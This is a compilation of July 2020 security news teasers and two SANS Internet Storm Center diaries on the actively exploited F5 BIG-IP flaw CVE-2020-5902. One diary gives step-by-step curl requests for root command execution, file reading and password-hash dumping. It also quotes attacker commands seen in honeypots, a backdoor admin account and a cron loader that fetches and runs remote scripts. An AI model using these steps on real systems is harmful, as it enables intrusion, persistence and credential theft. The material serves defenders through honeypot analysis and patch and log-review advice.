Posted by InfoSec News on Jul 06

By Duncan Riley
July 6, 2020

Information relating to millions of users of data sites have been found
exposed online in yet another case of misconfigured cloud storage.

Discovered late last week by security researchers at WizCase, the exposed
records span up to 11 different dating services, with five identified:

Posted by InfoSec News on Jul 06

By Alicia Hope
CPO Magazine
July 6, 2020

Hiscox report shows increasing cyber losses for businesses targeted by
various cyber risks. The study found losses stemming from cyber security
threats had grown almost six-fold, jumping from a median cost of $10,000
to $57,000 per company within the reported period. However, firms also...

Posted by InfoSec News on Jul 06

By Kyle Wiggers
July 6, 2020

As voice assistants like Google Assistant and Alexa increasingly make
their way into internet of things devices, it’s becoming harder to track
when audio recordings are sent to the cloud and who might gain access to
them. To spot transgressions, researchers at the University of Darmstadt,...

Posted by InfoSec News on Jul 06

By Alex Scroxton
Security Editor
July 7, 2020

The need to address the threat posed by malicious actors exploiting the
internet of things (IoT) to attack critical industrial infrastructure is
becoming an increasingly urgent one, according to the Foresight review of
cyber security for the Industrial IoT report published by...

Posted by InfoSec News on Jul 06

By John Raby
The Associated Press
July 6, 2020

CHARLESTON, W.Va. — A West Virginia woman who previously served in the Air
Force planned to offer top-secret information from the National Security
Agency to the Russian government, prosecutors said Monday in announcing
her conviction in federal court.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks Bit IP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed. 

Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far:

The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to "bash". 

The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display):

1. Create an "alias" to map the "list" command to "bash"

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'


2. Write a file to /tmp with the command to be executed

curl ';/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.



If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using:

curl -k ';/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release (Final)\n"}

Instead of defining an alias, the technique in step '1' can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined):

curl ';/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell none\n}\n"}

Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/paswd" and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:


which retrieves:

ulimit -n 65535
rm -f /etc/

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"

crontab -l | grep -e "" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
    crontab -l 2>/dev/null
    echo "* * * * * $LDR | sh > /dev/null 2>&1"
  ) | crontab -

this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

A remote code execution vulnerability %%cve:2020-5902%% in F5's BIG-IP with CVSS score 10 is actively exploited.

Vulnerable versions are:

  • 11.6.1-
  • 12.1.0-
  • 13.1.0-
  • 14.1.0-
  • 15.0.0-

A directory traversal in the Traffic Management User Interface (TMUI) allows upload and execution of scripts (as root) by unauthenticated attackers.

F5 has released patched versions:


F5's KB article K52145254: TMUI RCE vulnerability CVE-2020-5902.

We have observed Internet scans for this vulnerability. Remark that an attack over the Internet requires that F5's BIG-IP control plane is exposed to the Internet (there are 8400+ F5 systems on the Internet according to Shodan).

Several exploits and a Metasploit module for this vulnerability are public.

There is also a sigma rule and an nmap script (remark: not released by nmap).

We recommend to patch this vulnerability immediately if you expose the TMUI to the Internet, and if you can not do that, remove direct access to the TMUI from the Internet if you expose it.

In any case, go over your logs to identify exploitation attempts (F5 published the KB July 1st, and first exploitation attempts on te Internet were observed starting July 3rd): look for "..;" in the URLs. If you use grep (or another tool with regular expressions) to search through your logs, remember that . matches any character: use a fixed string (option -F in grep).

And let me close with Johannes closing remark on today's StormCast: "... certainly make sure that the management plane is not exposed to the public Internet, who knows when the next vulnerability in this feature will be found!"

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted by InfoSec News on Jul 06

By Justin Hendry
July 3, 2020

After years of apathy.

The Attorney-General’s Department has flagged that stricter cyber security
accountability mechanisms could be on the way for federal government
agencies following a string of worrying cyber resilience audits.

But the government remains tight-lipped on whether cyber security...

Posted by InfoSec News on Jul 06

By Catalin Cimpanu
Zero Day
July 1, 2020

In one of the biggest password re-use studies of its kind, an analysis of more
than one billion leaked credentials has discovered that one out of every 142
passwords is the classic "123456" string.

The study, carried out last month by computer engineering student Ata Hakçıl,
analyzed username and password...

Posted by InfoSec News on Jul 06

By Joseph Cox
July 2, 2020

Something wasn't right. Starting earlier this year, police kept arresting
associates of Mark, a UK-based alleged drug dealer. Mark took the security
of his operation seriously, with the gang using code names to discuss
business on custom, encrypted phones made by a company called Encrochat.
For legal reasons, Motherboard...

Posted by InfoSec News on Jul 06

By Lily Hay Newman
July 1, 2020

THIS TIME LAST year, Jaggar Henry was enjoying the summer like so many
other teens. The 17-year-old had a job, was hanging out with friends on
the weekends, and just generally spending a lot of time online. But then,
at the end of July, Henry combed his hair, donned a slightly oversized
Oxford shirt, and...

Posted by InfoSec News on Jul 06

By John Haughey
The Center Square
Washington Examiner
July 02, 2020

Florida on Wednesday became the nation’s first state to enact a DNA
privacy law, prohibiting life, disability and long-term care insurance
companies from using genetic tests for coverage purposes.

Gov. Ron DeSantis signed House Bill 1189,...

Posted by InfoSec News on Jul 06

By William Knowles @c4i
Senior Editor
InfoSec News
July 6, 2020

Just in case you accidentally had your work phone and duty pager in a Faraday
bag all July 4th holiday weekend long, you have one heckuva surprise waiting
for you!

As F5 reminds everyone that 48 of Fortune 50 companies are F5 customers,
F5 has published a security...

Posted by InfoSec News on Jul 06

By Sam Byford
The Verge
July 6, 2020

The UK may reverse its decision to allow Huawei as a supplier for the
country’s 5G network buildout after a report concluded that US sanctions
would make the Chinese telecom giant’s equipment less safe. The report
from GCHQ’s National Cyber Security Centre, leaked by The Telegraph and
corroborated by Bloomberg, claims...
Internet Storm Center Infocon Status